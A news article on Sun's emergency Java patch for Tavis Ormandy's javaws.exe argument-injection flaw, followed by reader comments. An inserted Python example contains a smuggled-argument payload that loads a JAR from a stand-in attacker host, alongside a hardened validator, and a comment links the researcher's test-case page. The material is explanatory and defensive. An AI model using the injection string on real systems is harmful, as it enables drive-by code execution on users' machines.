As attacks surface, Sun ships sudden Java patch
Summary: In a sudden about-face, Sun has rushed out a Java update to fix a drive-by download vulnerability that exposed Windows users to in-the-wild malware attacks.
The patch comes less than a week after Sun told a Google researcher it did not consider the issue serious enough to warrant an out-of-cycle patch and less than a day after researchers spotted live exploits on a booby-trapped song lyrics Web site.
The release notes that accompany the new Java 6 Update 20 make no mention of the public disclosure or of the subsequent attacks, but I've been able to confirm that the patch does cover the vulnerability disclosed by Google security researcher Tavis Ormandy.
After applying the fix on a Windows machine, Ormandy's proof-of-concept demo no longer worked. Instead of launching the calculator application, I got an error message from the Java Virtual Machine Launcher.

The flaw, which was also discovered independently by Ruben Santamarta, occurs because the Java browser plugin runs "javaws.exe" without validating the command-line parameters passed to it, so a malicious web page can hand the launcher arguments of its choosing.

Despite the absence of documentation, a researcher was able to determine that Sun removed the code that runs javaws.exe from the Java plugin.
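As an added illustration (not Sun's plugin code and not Ormandy's proof of concept), the Python below models the class of bug described above: a browser-exposed launcher that pastes a caller-supplied URL into a command line for javaws.exe, shown beside a version that validates the argument and passes it as a single argv element. The hostnames, file names and the injected options are constructed for the example; `-J` is javaws's real flag for passing options through to the JVM, which is what makes trailing options dangerous. Nothing is actually executed.

```python
"""Command-line argument injection through a browser-exposed launcher.

Added example modelling the javaws.exe flaw, not code from Sun or from the
published proof of concept. vulnerable_launch_cmdline() shows what happens
when the caller's string is glued into the command line verbatim;
hardened_launch_argv() shows the checks a launcher needs before it spawns
anything. Neither function runs a process.
"""
import shlex
from urllib.parse import urlsplit

LAUNCHER = "javaws.exe"          # the program the plugin spawned
ALLOWED_SCHEMES = {"http", "https"}

# Constructed malicious input: a plausible JNLP URL followed by injected
# javaws options. -J-jar tells javaws to hand -jar to the JVM, so the launcher
# would load the attacker's JAR from a remote share instead of the JNLP file.
MALICIOUS = r"http://example.test/app.jnlp -J-jar -J\\attacker.test\share\evil.jar"
BENIGN = "https://example.test/app.jnlp"


class LaunchRejected(ValueError):
    """Raised when the launch request fails validation."""


def vulnerable_launch_cmdline(url: str) -> list[str]:
    """Flawed behaviour: build one command-line string and let the OS split it.

    Returns the argv the launched program would see. shlex in non-POSIX mode
    approximates Windows tokenisation (splits on whitespace, keeps backslashes),
    which is enough to show that the URL's tail becomes separate options.
    """
    cmdline = f"{LAUNCHER} {url}"
    return shlex.split(cmdline, posix=False)


def hardened_launch_argv(url: str) -> list[str]:
    """Validate the caller's value and return a proper argv list.

    Rules: exactly one URL, no whitespace (so it can never become several
    arguments), no leading dash (so it can never be read as an option), and
    only http(s) with a host. The result is a list, never a joined string, so
    the URL reaches javaws as a single argument even if a check is later
    loosened.
    """
    if any(ch.isspace() for ch in url):
        raise LaunchRejected("whitespace in launch URL")
    if url.startswith("-"):
        raise LaunchRejected("launch URL looks like a command-line option")
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.netloc:
        raise LaunchRejected(f"unsupported launch URL: {url!r}")
    return [LAUNCHER, url]


def is_blocked(url: str) -> bool:
    """True if the hardened launcher refuses the request."""
    try:
        hardened_launch_argv(url)
    except LaunchRejected:
        return True
    return False


if __name__ == "__main__":
    print("vulnerable argv:", vulnerable_launch_cmdline(MALICIOUS))
    print("hardened blocks malicious input:", is_blocked(MALICIOUS))
    print("hardened argv for benign input:", hardened_launch_argv(BENIGN))
```

The important design point is the last one in `hardened_launch_argv`: validation alone is a denylist that can be bypassed by the next quoting trick, while handing the OS an argv list means the worst an attacker can do with a single argument is name a URL javaws will then fetch and check on its own terms.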
Here is a link to download the patch from Sun's Web site.
The about-face by Sun is another sign that some big vendors still struggle to understand the importance of working closely with white-hat researchers to understand the implications of a reported vulnerability. In this case, Google's Ormandy was forced to use the full-disclosure weapon to force the vendor into a proper response.

It's incomprehensible that a software vendor like Sun, now under Oracle's wing, could have misdiagnosed this vulnerability when Ormandy originally reported it. It was clear from the outset that this was a critical issue, and it had been found independently by several different hackers. On Twitter, Ormandy said he had no information that the issue was already being exploited in the wild before he wielded the full-disclosure stick. However, he maintains "it was just too trivial for that not to be the case."
To date, Oracle/Sun has not publicly commented on the disclosure of an issue that is being actively exploited.

Speaking of irresponsible, here's what I saw when I applied the new Java update this morning: the installer's Bing toolbar offer. Yes, checked by default. Sigh.
Talkback
They drag their heels* to the plate
* Heels in more ways than one.
Yay, Symantec!
YEA AVG
Gaxxis
Hmm, Symantec
RE: As attacks surface, Sun ships sudden Java patch
our speedy machines run like our beloved old IBM PC XT did...slow.
Still, I'm happy to see the patch hit. Beats Adobe's record
I can't find the link to download the fix
Don't be tricked about the Java version number.
Heads up!
Sun has a small (albeit important) correction to make.
Once you use the Java Control Panel to update, it says Version 20. However, when you install it and do "About," etc., it says Version 19.
In Add/Remove Programs it is listed as Version 20.
Small details do count.
rushed...
RE: As attacks surface, Sun ships sudden Java patch
lrfocke
Bing toolbar on Java update page
RE: As attacks surface, Sun ships sudden Java patch
test it
the link is:
http://lock.cmpxchg8b.com/bb5eafbc6c6e67e11c4afc88b4e1dd22/testcase.html
AVG is keeping me safe
AV developers are way faster to cover those vulnerabilities than the software makers.
Avast caught it
Yep..
Avast Pro v.5 definitely nailed that one!
RE: As attacks surface, Sun ships sudden Java patch
What I think is that this entire article and fuss is all ado about nada. From what I have read in earlier articles and posts this is all BS, designed especially for the super tech types to weigh in and try to prove how much they think they know.
This is all baloney. If it wasn't then every swinging dick that is using Java on a Windows machine would be getting their ass kicked, and it would be media central because every reporter on the planet would be getting affected.
In other words, STFU.
?????????????????????
The demo in the article proves it can launch an arbitrary executable on any vulnerable machine just by visiting the page. That alone is a critical security failure. For my own testing in a private environment, I confirmed that pretty much anything is open, including a silent background download and installation of whatever program I chose, completely without prompting of any kind, just by visiting the page.
What does Bing have to do with Java?
great...
Sun... sorry, Oracle decided to include the Bing search bar (and like every other crapware it's checked by default...) instead of the Google bar (which was also checked by default like every other crapware)...
It was a Java vulnerability... not a MS vulnerability... they just want to try to install crapware at the same time...
crapware